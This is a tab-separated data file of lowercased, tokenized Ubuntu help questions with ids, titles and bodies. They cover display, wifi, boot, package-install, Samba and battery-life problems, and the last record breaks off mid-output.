461553	which command line commands enable `` mirror '' feature in the screen display gui ?	i 'm mirriong a laptop with lcd tv through hdmi cable . everytime i reboot i have to go to : system settings -- > screen display to enable mirroring again . hence , i 'm planning to write a bash script which enable this feature after logging in . however , i do n't know which commands to type so that i can achieve the mirror feature . i 'm using ubuntu 14.04 with the latest amd driver ( 14.4 ) for radeon 7xxx series so amdccle is installed but i 'm not enabling it from there ... note : i 'm ok with using the alternative , amdccle , if necessary .
461555	ca n't access wireless on ubuntu 13.10	i am new to ubuntu and have the 13.10 on a dell inspiron 2200 . i ca n't access the wireless capability at all . i do n't see its icon . i know there 's an adaptor because it worked on windows xp . when i run sudo lshw -c network i get the following : *-network:0 description : network controller product : bcm4318 [ airforce one 54g ] 802.11g wireless lan controller vendor : broadcom corporation physical id : 3 bus info : pci @ 0000:02:03.0 version : 02 width : 32 bits clock : 33mhz capabilities : bus_master configuration : driver=wl latency=64 resources : irq:19 memory : dfdfe000-dfdfffff *-network:1 description : ethernet interface product : 82562et/ez/gt/gz - pro/100 ve ( lom ) ethernet controller mobile vendor : intel corporation physical id : 8 bus info : pci @ 0000:02:08.0 logical name : eth0 version : 03 serial : 00:12:3f:1d : ad:66 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full ip=192.168.1.101 latency=64 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mbit/s resources : irq:20 memory : dfdfd000-dfdfdfff ioport : df40 ( size=64 ) so i know there 's a wireless controller there , but it 's just not working . i tried installing drivers on the software updates section but there was nothing there .
461559	stuck in low graphics mode in live cd as well as in normal boot after insatllation of ubuntu14.04	i installed ubuntu 14.04.but it got stuck with error system is running in low graphics mode in live cd booting as well as in normal booting.i tried all the suggestions in ubuntu forums . can any one help me ? ask for your queries please..
461564	ubuntu 14.04 boot error	ubuntu runs smoothly on my system but after updating it created a critical problem . when i start my computer its says following errors : — boot args ( cat /proc/cmdline ) — check rootdelay= ( did the system wait long enough ? ) — check root= ( did the system wait for the right device ? ) — missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/xxxxxxxxx does not exist . dropping to a shell ! busybox v.1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for list of built-in commands . ( initramfs ) .. after typing blkid i got following details below : - /dev/sda1 : label= '' backu '' uuid= '' c4406f0a406fo312 '' type = `` ntfs '' /dev/sda3 : label= '' linux '' c6e7b2c6-5e8f- 4a2d-b666-9489ef7c7c8f '' type = `` ext4 '' /dev/sda5 : uuid= '' 6e0361c9- bbb6-4395-a75e-ef8d645245d0 '' type = `` ext4 '' /dev/sda6 : uuid= '' 740f28da-723a-40d3-995b- 3d5dc0d30120 '' type = `` ext4 '' /dev/sda7 : uuid= '' 30c1ba3b- dd3e-4ec2-989b-2e3a3d0d30d8067 '' type = `` ext4 '' /dev/sda8 : uuid= '' 06145b6-0538-4a4b- b424-a5f7a732e8e1 '' type = `` swap ''
461565	remote desktop - sub user fail	the problem is this ... xrdp works just fine under 'root ' user , and the desktop ( lubuntu ) connects fine ... but i can not get other user accounts to connect ( such as my freshly made 'admin ' or 'dev ' accounts ) , i get the bank window or remote logon crash .
461567	downgrade from 14.04 to 12.04	i recently installed version 14.04 on ubuntu laptop and sadly regretted it . is it possible to downgrade back to 12.04 and if so , how ? thanks
461568	how to move a visible file to a hidden folder ?	i 've only been using ubuntu for two weeks and have been able to find answers to any problem i had , however this one defies my searches . i want to move a visible programme file ( wallch ) to a hidden directory ./config/autostart . i have been able to enter this directory and the subject file is not there and i want to have this program start at bootup . can anyone assist ? thanking you
461570	installing apr ( apache portable runtime libray ) and got this error libtool.m4 not found while running ./buildconf	when i run ./buildconf , it yields an error . the output is below : nchandu @ nchandu-optiplex-380 : ~/software/pyactivemq/apr-1.3.12 $ ./buildconf buildconf : checking installation ... buildconf : python version 2.7.3 ( ok ) buildconf : autoconf version 2.68 ( ok ) buildconf : libtool version 2.4.2 ( ok ) copying libtool helper files ... /libtool.m4 not found here i m going to install apr on ubuntu12.04 how to fix this and install apr ( apache portablr runtime )
461575	tomboy notes is not starting	my tomboy notes is not starting . as soon as i start it , it gets closed . this problem started when i added a task in tasque and the task importer plugin was enabled in tomboy notes and then just happened to open my tomboy notes and it crashed . now i am using gnote from few days , but i 'm not satisfied . i want tomboy back . what must i do in order to get tomboy working again ? tell me how to reset it and as i have all the backups of my notes . even removing it and reinstalling it will do for me . tell me the procedure .
461576	is there any command similar to qlmanage in mac os ?	is qlmanage command is present in ubuntu ? or is there any similar commands ?
461577	how to install slidewall	after the upgrade from 13.10 to 14.04 i had problems showing the datetime-indicator ( missing date & time from top panel of unity desktop - ubuntu 14.04 ) . so i 'm looking for other options to show the clock . i 'm working with two monitors and thought that a clock on the wallpaper could be a solution . so i found `` slidewall '' . but i only found installation instructions up to ubuntu 13.04 : http : //www.webupd8.org/2012/08/use-wallpaper-clocks-live-earth.html is there a way to install slidewall on ubuntu 14.04 ?
461579	error message when updating ubuntu 12.10	i am using ubuntu 12.10 . when i was trying to update the software , i got a message : the upgrade needs a total of 25.5 m free space on disk '/boot ' . please free at least anadditional 25.5 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean'.` i tried typing sudo apt-get clean , same error masage came out . again typed sudo apt-get autoremove ; the outcome is : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 51 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up initramfs-tools ( 0.103ubuntu0.2.2 ) ... update-initramfs : deferring update ( trigger activated ) setting up linux-image-extra-3.5.0-48-generic ( 3.5.0-48.72 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.5.0-48-generic /boot/vmlinuz-3.5.0-48-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.5.0-48-generic /boot/vmlinuz-3.5.0-48-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-48-generic /boot/vmlinuz-3.5.0-48-generic update-initramfs : generating /boot/initrd.img-3.5.0-48-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.5.0-48-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.5.0-48-generic.postinst line 1010. dpkg : error processing linux-image-extra-3.5.0-48-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-extra-3.5.0-48-generic ; however : package linux-image-extra-3.5.0-48-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-48-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.5.0-48-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-extra-3.5.0-48-generic linux-image-generic linux-generic initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) * and i am not able to update . i will be happy if anybody can help me .
461580	i can not write on and delete from my phone connected via usb	i have checked out this question how to make read-only file system writable ? but i still have the problem . my option is 'rw ' , but it does not help , i still can not write files and delete mount| grep 0001-e856 /dev/sdc1 on /media/0001-e856 type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks ) other options : phone is nokia x2-02 , connected via mini usb cable and with a micro sd card .
461581	strange characters in libreoffice writer when creating a new document	when i am trying to create and open a new odt/doc document ( by creating a file called xyz.odt ) , strange characters are showing up . the document should be empty ideally when its opening . when i delete the chars and write something to save the file , the file is fine , i.e . the data is retained correctly and no strange chars are shown . these are the characters i see : �� # ࡱ # � # # # # # # # # # # # # # # # # ; # # # �� # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ���� # # # # ���� # # # # # # # # �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������r # o # o # t # # e # n # t # r # y # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ������������ # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ���� # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ������������ # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ���� # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ������������ # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ���� # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ������������ # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ���� # # # # # # # #
461582	kvm image size has changed ?	we had a 180gb vm image . inside the guest vm everything is ok and hdd size is 180g . but when we look the image size on the host it is 475mb . i am afraid that if we restart , the vm would n't work . i checked the size by ls -sh 457m x.img and qemu-img info x.img file format : raw virtual size : 456m ( 478309888 bytes ) disk size : 456m this is the this configuration : < disk type='file ' device='disk ' > < driver name='qemu ' type='raw'/ > < source file='/vm/x.img'/ > < target dev='vda ' bus='virtio'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x05 ' function='0x0'/ > < /disk > and the disk cache setting is default . both host and vm are ubuntu 12.04
461583	installed letodms how do i change the data storage to a designated hard drive ?	i installed letodms from the ubuntu software center on a 14.04 ubuntu desktop . everything seems to go okay but i ca n't figure out how to change the document storage to a specific drive that i set aside for this purpose . does anyone know how to do this ? the info on the site is not specific enough for me to be sure where to start at after it 's been installed this way . thanks for your patience and time for a newbie
461588	installation ubuntu 14.04 on desktop	will a dual-boot install automatically prepare an ubuntu-partition and on which logical unit ? how can one uninstall ubuntu ?
461589	printer icon appears in panel	i am using xfce 4.10 . i installed a network printer and successfully printed a test page , and then i noticed that a small printer icon had appeared inside the right most windows entry in the panel at the top of the screen . no response to any clicks and does not appear in menu editor . the printer properties page says it is `` idle and waiting for the printer to finish '' . yet printer had finished . any ideas ?
461591	have to restart lightdm to get working window response	every time i boot my computer , i need to restart lightdm to have anything but the desktop respond to mouse click events . it works fine after this . i just installed ubuntu 14.04 on a custom-built amd fx-based machine , and i have a r.a.t.5 mouse that tends to stir up trouble .
461593	how to prevent fonts from rescaling	in ubuntu 14.04 there 's a new feature that i love called `` scale for menu and title bars '' . it is located in the display settings . i have set the scaling to 0.875 . since setting this , i have had many issues with the fonts being rescaled at log-in to extremely small sizes ( it varies ) . it also occasionally just changes even without logging out . in order to fix this , i am having to open either the unity tweak tool ( fonts setting ) or ubuntu tweak and readjust to back to the scale of 1.0 . is there anyway to configure the system so that it stops rescaling my fonts but keep the scaled menu and titlebars ?
461594	does upgrade affect ubuntu or kernel version ?	does upgrade lead to running the latest ubuntu version ? or does it only upgrade the kernel ? is not upgrading the kernel the same thing as upgrading the operating system itself to a newer version ?
461596	ap-hotspot wifi connection	i have created a wifi connection using ap-hotspot that can be accessed by android devices . the problem is , it stops whenver the terminal command is put on background . can anyone help me with this issue ? what is the refreshing time of ap-hotspot ?
461597	why do commented lines in a linux configuration file sometimes work ?	by a commented line i mean either : # ! /usr/bin/perl -w and the comments in /boot/grub/menu.lst file as described in this answer on superuser . it already has a comment , i.e the line begins with a # , but still is being interpreted . why is that so ?
461603	i ca n't get my kobo to work with ade in wine	i 'm running lubuntu on a pc and i ca n't get my kobo to work or show up in my adobe digital editions . i 've tried running it in wine and it worked at first now it does n't .
461604	holding touchpad button detect multitouch	i just swiched over to kubuntu from windows . everything works for now , except 1 thing realy bothers me . i have asus n750 with touchpad . in windows , if i had my finger placed on left button , i was able to move mouse with another finger moving on pad . on linux this is automaticly detectede as multouch gesture and will not work as intented . maybe the picture can explain better . so what happens is . if i have finger 1 down on red dot , and move finger 2 from green 1 to green 2 it will not detect mouse move . is there anything i can do to fix this ?
461607	sudo apt-get -f intall - > e : sub-process /usr/bin/dpkg returned an error code ( 1 )	i want to install `` ghostview '' by using ubuntu software center . however , the error message occurs and i type as sudo apt-get -f install after that , i can get this result reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libgfortran3 g++-4.6 linux-headers-3.2.0-29 libgmp-dev libffi-dev libbsd-dev linux-headers-3.2.0-29-generic-pae libgmpxx4ldbl gfortran-4.6 libstdc++6-4.6-dev openjdk-7-jre-lib use 'apt-get autoremove ' to remove them . the following extra packages will be installed : icedtea-6-jre-cacao icedtea-6-jre-jamvm the following packages will be upgraded : icedtea-6-jre-cacao icedtea-6-jre-jamvm 2 upgraded , 0 newly installed , 0 to remove and 99 not upgraded . 102 not fully installed or removed . need to get 0 b/1,318 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up linux-backports-modules-cw-3.4-3.2.0-37-generic-pae ( 3.2.0-37.24 ) ... update-initramfs : generating /boot/initrd.img-3.2.0-37-generic-pae gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-37-generic-pae with 1. dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-37-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up linux-backports-modules-cw-3.4-3.2.0-38-virtual ( 3.2.0-38.25 ) ... update-initramfs : generating /boot/initrd.img-3.2.0-38-virtual gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-38-virtual with 1. dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-38-virtual ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up linux-backports-modules-cw-3.4-3.2.0-43-generic-pae ( 3.2.0-43.31 ) ... update-initramfs : generating /boot/initrd.img-3.2.0-43-generic-pae e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-45-generic with 1. dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-45-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up linux-backports-modules-cw-3.4-3.2.0-45-generic-pae ( 3.2.0-45.33 ) ... update-initramfs : generating /boot/initrd.img-3.2.0-45-generic-pae gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-45-generic-pae with 1. dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-45-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up linux-backports-modules-cw-3.4-3.2.0-49-generic ( 3.2.0-49.37 ) ... update-initramfs : generating /boot/initrd.img-3.2.0-49-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-49-generic with 1. dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-49-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up linux-backports-modules-cw-3.4-3.2.0-55-virtual ( 3.2.0-55.44 ) ... update-initramfs : generating /boot/initrd.img-3.2.0-55-virtual gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-55-virtual with 1. dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-55-virtual ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up linux-backports-modules-cw-3.4-3.2.0-58-generic-pae ( 3.2.0-58.48 ) ... update-initramfs : generating /boot/initrd.img-3.2.0-58-generic-pae gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-58-generic-pae with 1. dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-58-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of icedtea-6-jre-cacao : icedtea-6-jre-cacao depends on openjdk-6-jre-headless ( =6b30-1.13.1-1ubuntu2~0.12.04.3 ) ; however : version of openjdk-6-jre-headless on system is 6b31-1.13.3-1ubuntu1~0.12.04.2 . dpkg : error processing icedtea-6-jre-cacao ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of icedtea-6-jre-jamvm : icedtea-6-jre-jamvm depends on openjdk-6-jre-headless ( =6b30-1.13.1-1ubuntu2~0.12.04.3 ) ; however : version of openjdk-6-jre-headless on system is 6b31-1.13.3-1ubuntu1~0.12.04.2 . dpkg : error processing icedtea-6-jre-jamvm ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already setting up initramfs-tools ( 0.99ubuntu13.5 ) ... update-initramfs : deferring update ( trigger activated ) setting up linux-image-3.2.0-37-generic ( 3.2.0-37.58 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-48-virtual examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic update-initramfs : generating /boot/initrd.img-3.2.0-37-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-37-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-37-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-37-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-backports-modules-cw-3.4-3.2.0-37-generic : linux-backports-modules-cw-3.4-3.2.0-37-generic depends on linux-image-3.2.0-37-generic ; however : package linux-image-3.2.0-37-generic is not configured yet . dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-37-generic ( -- configure ) : dependency problems - leaving unconfigured setting up linux-image-3.2.0-37-virtual ( 3.2.0-37.58 ) ... no apport report written because maxreports is reached already no apport report written because maxreports is reached already running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-37-virtual /boot/vmlinuz-3.2.0-37-virtual run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-37-virtual /boot/vmlinuz-3.2.0-37-virtual update-initramfs : generating /boot/initrd.img-3.2.0-37-virtual gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-37-virtual with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-37-virtual.postinst line 1010. dpkg : error processing linux-image-3.2.0-37-virtual ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-backports-modules-cw-3.4-3.2.0-37-virtual : linux-backports-modules-cw-3.4-3.2.0-37-virtual depends on linux-image-3.2.0-37-virtual ; however : package linux-image-3.2.0-37-virtual is not configured yet . ( ellipsis ... . ) no apport report written because maxreports is reached already setting up linux-image-3.2.0-44-generic ( 3.2.0-44.69 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-43-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-44-generic /boot/vmlinuz-3.2.0-44-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-44-generic /boot/vmlinuz-3.2.0-44-generic update-initramfs : generating /boot/initrd.img-3.2.0-44-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-43-generic-pae with 1. dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-43-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up linux-backports-modules-cw-3.4-3.2.0-43-virtual ( 3.2.0-43.31 ) ... update-initramfs : generating /boot/initrd.img-3.2.0-43-virtual gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-43-virtual with 1. dpkg : error processing linux-backports-modules-cw-3.4-3.2.0-43-virtual ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up linux-backports-modules-cw-3.4-3.2.0-44-generic-pae ( 3.2.0-44.32 ) ... update-initramfs : generating /boot/initrd.img-3.2.0-44-generic-pae ( ellipsis ... . ) linux-backports-modules-cw-3.4-3.2.0-48-virtual initramfs-tools processing was halted because there were too many errors . e : sub-process /usr/bin/dpkg returned an error code ( 1 ) maybe , main points of view are gzip : stdout : no space left on device and processing was halted because there were too many errors . e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what is the problem ? ? and what is some solution for this problem ? ? ?
461614	the mobile broadband ( express card sierra wireless aircard 890 ) is no longer able to connect 3g network , after installing new u 14.04 lts,	when i ran ubuntu 13.10 and previous version , i can use mobile broadband/ express card ( the sierra wireless aircard 890 ) to access internet via 3g . after installing new 14.04 lts , the thing has gone . i can no longer use the express card . when i chose to connect 3g via the `` mobile broadband '' , it does automatically dropout the netwotk , just immediately . the card 's hotter than when running in previous version of ubuntu . how to check which part causing the trouble , then fix it , please ?
461616	samba - usershare directory on shared computer	i have a computer which is shared to domain users . they can login with their domain account . it is using ubuntu 12.04 64 bit , samba version : 2:3.6.3-2ubuntu2.10 i setup pam on /etc/pam.d/common-session session required pam_mkhomedir.so skel=/etc/skel/ umask=0077 when users login with their domain account , their home directory will be created automatically on /home with permission . ls -la /home drwx -- -- -- 19 user.test domain users 4096 apr 28 10:20 user.test drwx -- -- -- 19 user2.test domain users 4096 apr 28 10:20 user2.test i set umask=0077 because i do n't want domain user can read other user 's home directory now we have problem with the usershare . if domain user create a shared folder in their desktop folder ( /home/user.test/desktop/test ) and share it by right click on that folder choose `` sharing options '' with the checks ( `` share this folder '' : on , `` allow others to create and delete files in this folder '' : on ) ls -la /home/user.test/desktop drwxrwxrwx 2 user.test domain users 4096 may 6 14:21 test cat /var/lib/samba/usershares/test # version 2 path=/home/user.test/desktop/test comment= usershare_acl=s-1-1-0 : f guest_ok=n sharename=test the share name `` test '' is now available to access on the network , but only user `` user.test '' can access it , other users ca n't access it but if i chmod 770 /home/user.test ls -la /home drwxrwx -- - 19 user.test domain users 4096 apr 28 10:20 user.test drwx -- -- -- 19 user2.test domain users 4096 apr 28 10:20 user2.test i am able to access the share `` test '' by other domain users ( `` user2.test '' ) how can i bypass this without chmod user 's home directory since this is insecurity ? thanks a lot !
461620	ubuntu 14.04 draining laptop battery quicker than in 12.04 ( 1 hour versus 4+ hours )	i have recently upgraded to ubuntu 14.04 on a lenovo t420 laptop ( corei7-2620m cpu @ 2.70ghz × 4 + sandybridge mobile ) . the battery is now over 2 years old , but under ubuntu 12.04 it still lasted between 4 and 5 hours . now with ubuntu 14.04 it lasts little over one hour . what can i do about this issue ? install drivers ? optimise the power management somehow ? update i : regarding the graphics card : $ lspci | grep -i -- color 'vga' 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) update ii : below is a sample output from powertop . i do not see anything strange , although i never used this programme before . any insight is welcome . usage events/s category description 2419 rpm device laptop fan 8.1 ms/s 216.8 timer hrtimer_wakeup 42.5 ms/s 111.7 process /usr/lib/firefox/firefox 100.0 % device audio codec hwc0d1 : conexant 100.0 % device audio codec hwc0d0 : conexant 6.5 ms/s 73.0 process /opt/ibm/lotus/notes/framework/../notes /authenticate 3.8 ms/s 76.7 interrupt ps/2 touchpad / keyboard / mouse 1.0 ms/s 64.1 kwork od_dbs_timer 15.8 ms/s 27.9 process compiz 7.7 ms/s 32.0 process gnome-terminal 214.0 µs/s 26.4 kwork disk_events_workfn 24.5 ms/s 26.7 process /usr/lib/firefox/plugin-container /usr/lib/flashplugin-installer/libflashplayer.so -greomni /usr/lib/firefox/omni.ja -appomni / 17.9 ms/s 28.3 process /usr/bin/x -core :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 5.3 ms/s 31.4 process /usr/bin/java -dosgi.requiredjavaversion=1.6 -xx : maxpermsize=256m -xms40m -xmx512m -jar /usr/share/eclipse.kepler//plugins/org . 1.2 ms/s 32.7 process /home/desousa/.rvm/rubies/ruby-1.9.2-p290/bin/ruby script/rails s 1.5 ms/s 18.7 timer tick_sched_timer 372.4 µs/s 16.3 process [ rcu_sched ] 3.4 ms/s 12.8 process transmission-gtk /home/desousa/desktop/ [ kickass.to ] kalashnikov.oh.yeah.motherfucker.2007.torrent 1.2 ms/s 11.0 interrupt [ 42 ] 464.6 µs/s 7.7 process /usr/lib/firefox/plugin-container /opt/google/talkplugin/libnpgoogletalk.so -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib 1.8 ms/s 10.2 process /opt/ibm/lotus/notes/framework/rcp/eclipse/plugins/com.ibm.rcp.base_6.2.3.20110915-1350/linux/x86/notes2 -- launcher.suppresserr 492.4 µs/s 9.8 process [ irq/44-iwlwifi ] 1.2 ms/s 8.4 interrupt [ 0 ] hi_softirq 100.4 µs/s 7.6 timer ehci_hrtimer_func 498.1 µs/s 7.0 process /usr/lib/jvm/java-6-sun/jre/bin/java -djava.util.logging.config.file=/usr/share/tomcat7/conf/logging.properties -djava.util.log 0.9 ms/s 6.1 process diodon 130.8 µs/s 6.4 kwork ieee80211_iface_work 38.7 µs/s 6.4 kwork gen6_force_wake_work 76.9 µs/s 6.1 kwork intel_unpin_work_fn 342.9 µs/s 5.6 process /usr/sbin/mysqld 0.7 ms/s 5.4 interrupt [ 3 ] net_rx ( softirq ) 90.6 µs/s 5.5 interrupt [ 44 ] iwlwifi 3.1 ms/s 2.9 process gedit 186.7 µs/s 4.1 process syndaemon -i 1.0 -t -k -r 179.0 µs/s 4.2 process /opt/google/talkplugin/googletalkplugin 238.6 µs/s 4.1 process /opt/ibm/lotus/notes/taskldr /opt/ibm/lotus/notes/taskldr update iii : i did another test , running the laptop until the battery was completely drained . there are two important differences in battery management from 12.04 : whereas with 12.04 the screen would be dimmed after 30 seconds of inaction , with 14.04 the screen is always left with the same brightness . there are even moments when the fan speeds up when i am not typing , this never happened with 12.04 . although i have set the laptop to suspend after 10 minutes inactive on battery , it never suspends . once the 10 minutes are past ubuntu simply shows the log on screen ; it does not dim the screen either . update iv : i run the updates yesterday and the battery is being discharged even faster , now it is gone in less that an hour . below is the output of powertop minutes after unplugging . the battery reports a discharge rate of 32.8 w the estimated remaining time is 0 hours , 56 minutes summary : 722.8 wakeups/second , 149.5 gpu ops/seconds , 0.0 vfs ops/sec and 23.3 % cpu use power est . usage events/s category description 5.55 w 63.2 % device display backlight 90.2 mw 162.0 ms/s 220.6 process /usr/lib/firefox/firefox 70.7 mw 31.0 µs/s 26.3 process postgres : wal writer process 21.0 mw 306.3 µs/s 30.0 process [ irq/44-iwlwifi ] 19.6 mw 8.6 ms/s 63.0 process compiz 7.63 mw 1.7 ms/s 24.5 process /opt/ibm/lotus/notes/notes /authenticate 6.43 mw 2.2 pkts/s device network interface : wlan0 ( iwlwifi ) 1.35 mw 188.5 µs/s 2.3 process diodon 997 µw 77.2 µs/s 2.6 process syndaemon -i 1.0 -t -k -r 798 µw 4.2 ms/s 19.3 process /usr/bin/java -dosgi.requiredjavaversion=1.6 -xx : maxpermsize=256m -xms40m -xmx512m -jar /usr/share/eclipse.kepler//plugins/org . 499 µw 394.4 µs/s 1.1 process gnome-terminal 299 µw 2.3 ms/s 7.0 process mono /usr/lib/tomboy/tomboy.exe -- search 0 mw 3.9 µs/s 0.15 process sametime_idlemon 20 10 0 mw 13.7 ms/s 5.1 process /usr/bin/x -core :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 0 mw 12.6 ms/s 17.7 process /usr/lib/firefox/plugin-container /usr/lib/flashplugin-installer/libflashplayer.so -greomni /usr/lib/firefox/omni.ja -appomni / 0 mw 6.1 ms/s 163.9 timer hrtimer_wakeup 0 mw 2.7 ms/s 25.6 interrupt [ 42 ] i915 0 mw 2.5 ms/s 14.4 timer tick_sched_timer 0 mw 2.0 ms/s 19.2 process rhythmbox 0 mw 1.9 ms/s 7.5 process /usr/bin/pulseaudio -- start -- log-target=syslog 0 mw 1.3 